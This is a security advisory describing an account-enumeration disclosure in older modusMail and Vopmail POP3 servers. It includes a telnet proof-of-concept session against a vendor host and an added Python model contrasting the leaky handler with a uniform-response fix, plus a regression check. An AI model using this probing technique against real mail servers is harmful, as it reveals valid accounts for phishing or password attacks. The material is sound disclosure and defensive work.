modusMail All in one email security solution
The modusMail™ mail server provides all-in-one email services, messaging security and spam protection. [ Taken from: http://www.vircom.com/en/products/modusmail/ ]
A conditional information disclosure exists in older versions of modusMail and Vopmail that reveals whether an email account exists. The disclosure is conditional upon the presence of an @ or % character in the username, a form usually used when one mail system is responsible for the email of several domains. If the @ or % character is not present in the username, the POP3 server requests a password before rejecting the login. If the character is present, the server aborts the login attempt as soon as it has received the user portion of the login.
- Discovered by: Eldar “Wireghoul” Marcussen
- Vendor: Vircom - http://www.vircom.com
- Affected versions:
  - modusMail <= 4.4.491
  - Probably all versions of Vopmail
Proof of Concept
    ~$ telnet pop.vircom.com 110
    Trying 220.127.116.11...
    Connected to gate.vircom.com.
    Escape character is '^]'.
    +OK modusMail POP3 Server 4.4.491.0 Ready <mailto:firstname.lastname@example.org> <email@example.com>
    user nosuchuserhere
    +OK nosuchuserhere is welcome here
    quit
    +OK vircom.com POP3 server signing off (mailbox empty)
    Connection closed by foreign host.

    ~$ telnet pop.vircom.com 110
    Trying 18.104.22.168...
    Connected to gate.vircom.com.
    Escape character is '^]'.
    +OK modusMail POP3 Server 4.4.491.0 Ready <mailto:firstname.lastname@example.org> <email@example.com>
    user firstname.lastname@example.org
    -ERR email@example.com not known
    user nosuchuser%nosuchhost.com
    -ERR nosuchuser%nosuchhost.com not known
    quit
    +OK vircom.com POP3 server signing off (mailbox empty)
    Connection closed by foreign host.
Upgrade to a more recent version
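The behaviour described above, modelled next to a uniform-response alternative, with a regression check a mail server maintainer could run against either. This is an added example, not Vircom's code or its actual fix; the class names, the `ACCOUNTS` store, the reply text of the hardened handler and the sample accounts are all assumptions made for illustration.

```python
import hmac

# Constructed sample account store; plaintext only to keep the example short.
ACCOUNTS = {"alice@example.test": "correct horse"}


class LeakyPop3Auth:
    """Models the reported behaviour: a username containing '@' or '%' is
    looked up at the USER step, so an unknown account is rejected early."""

    def __init__(self):
        self.user = None

    def user_cmd(self, name):
        if ("@" in name or "%" in name) and name not in ACCOUNTS:
            return f"-ERR {name} not known"
        self.user = name
        return f"+OK {name} is welcome here"

    def pass_cmd(self, password):
        # Always run the comparison, then require that the account exists.
        stored = ACCOUNTS.get(self.user, "")
        match = hmac.compare_digest(stored.encode(), password.encode())
        ok = match and self.user in ACCOUNTS
        return "+OK mailbox ready" if ok else "-ERR authentication failed"


class UniformPop3Auth(LeakyPop3Auth):
    """Hardened form: USER never consults the account store, and every
    failure surfaces at PASS with one generic message."""

    def user_cmd(self, name):
        self.user = name
        return "+OK send PASS"


def leaks_account_existence(auth_cls, known, unknown):
    """Regression check: True if replies differ for known vs unknown users."""
    def replies(name):
        session = auth_cls()
        first = session.user_cmd(name)
        second = session.pass_cmd("wrong") if first.startswith("+OK") else None
        # Mask the echoed username so only the server's decision is compared.
        return first.replace(name, "<user>"), second
    return replies(known) != replies(unknown)
```

`leaks_account_existence` compares the full USER/PASS reply sequence for a known and an unknown account, so it also catches a handler that moves the distinguishing message from the USER step to the PASS step.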
Disclosure time line
- 06-Nov-2009 - Public disclosure
- 15-Sep-2006 - New version of modusMail mitigates this
- 20-Aug-2006 - Vendor acknowledges vulnerability
- 19-Aug-2006 - Vendor notified through email